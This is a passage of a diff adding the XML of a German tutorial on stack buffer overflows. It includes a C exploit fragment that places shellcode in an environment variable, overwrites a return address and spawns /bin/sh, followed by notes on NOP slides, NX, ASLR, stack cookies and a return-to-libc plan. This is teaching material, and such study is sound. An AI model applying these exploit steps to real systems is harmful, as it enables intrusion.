+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, "EGG=", 4);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">(buffer+4, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>shellcode</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, 24);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">(buffer+88, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>retaddr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, 4);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(buffer+92, "\x00\x00\x00\x00", 4);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>putenv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>system</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>("/bin/</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>sh</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>return</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 0;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc339281421"/>
+      <w:r>
+        <w:t>Durchführung</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="19"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17660B0C" wp14:editId="40C2783E">
+            <wp:extent cx="5090905" cy="1747625"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="16" name="Grafik 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="part_7_1.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120367" cy="1757739"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Abbildung </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>5</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> vor </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>überschreibung</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27378DC2" wp14:editId="19460519">
+            <wp:extent cx="5138943" cy="1348760"/>
+            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
+            <wp:docPr id="17" name="Grafik 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="part_7_2.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5147071" cy="1350893"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Abbildung </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>6</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> nach der Überschreibung</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DB05787" wp14:editId="011AC0AC">
+            <wp:extent cx="5024643" cy="846957"/>
+            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
+            <wp:docPr id="18" name="Grafik 18"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="part_7_3.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5051519" cy="851487"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+        <w:sectPr>
+          <w:pgSz w:w="11906" w:h="16838"/>
+          <w:pgMar w:top="1417" w:right="1417" w:bottom="1134" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:cols w:space="708"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Abbildung </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>7</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> - Geöffnete Shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Toc339281422"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Return </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Libc</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc339281423"/>
+      <w:r>
+        <w:t>NOP-Rutschen machen das Leben einfacherer</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:object w:dxaOrig="12368" w:dyaOrig="5877">
+          <v:shape id="_x0000_i1032" type="#_x0000_t75" style="width:618.75pt;height:293.55pt" o:ole="">
+            <v:imagedata r:id="rId31" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1032" DrawAspect="Content" ObjectID="_1413023294" r:id="rId32"/>
+        </w:object>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:sectPr>
+          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
+          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1134" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:cols w:space="708"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="_Toc339281424"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Techniken um </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Buffer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Overflow zu verhindern</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Programmierer schreiben sicheren Code mit Überprüfung der Speichergrenzen</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>OS Level Änderungen</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>NX (non-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>executable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>memory</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>ASLR (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Space Layout </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Randomization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Smashing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>protection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> mithilfe von </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Cookies</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_Toc339281425"/>
+      <w:r>
+        <w:t>Non-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Executable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="23"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Schutzmechanismus, mit dem Ziel </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Buffer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Overflows zu verhindern</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Die bekannteste Implementierung ist NX: Non-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Executable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Memory</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Befehle auf dem </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> können nicht ausgeführt werden</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Der </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> kann weiterhin überschrieben werden</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Schützt den </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> selbst nicht</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc339281426"/>
+      <w:r>
+        <w:t xml:space="preserve">Return </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Libc</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="24"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Wenn wir den </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> überschreiben können, kontrollieren wir EIP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Wir wollen EIP auf etwas zeigen lassen, was für uns eine Shell (/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/) erstellt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Warum EIP nicht in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Libc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> zeigen lassen?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>System() hilft uns eine Shell zu bekommen</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Libc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ist in den meisten Programmen im Speicherbereich abgebildet</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc339281427"/>
+      <w:r>
+        <w:t>Was ist der Plan</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> mit dem angreifbaren </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Buffer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> überschreiben</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Return </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">() auf System()  in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Libc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> zeigen lassen</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Argumente für System auf dem </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> einrichten </w:t>
+      </w:r>
+      <w:r>
+        <w:sym w:font="Wingdings" w:char="F0E8"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Die nächste Adresse zeigt auf den Exit() Aufruf in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Libc</w:t>
+      </w:r>
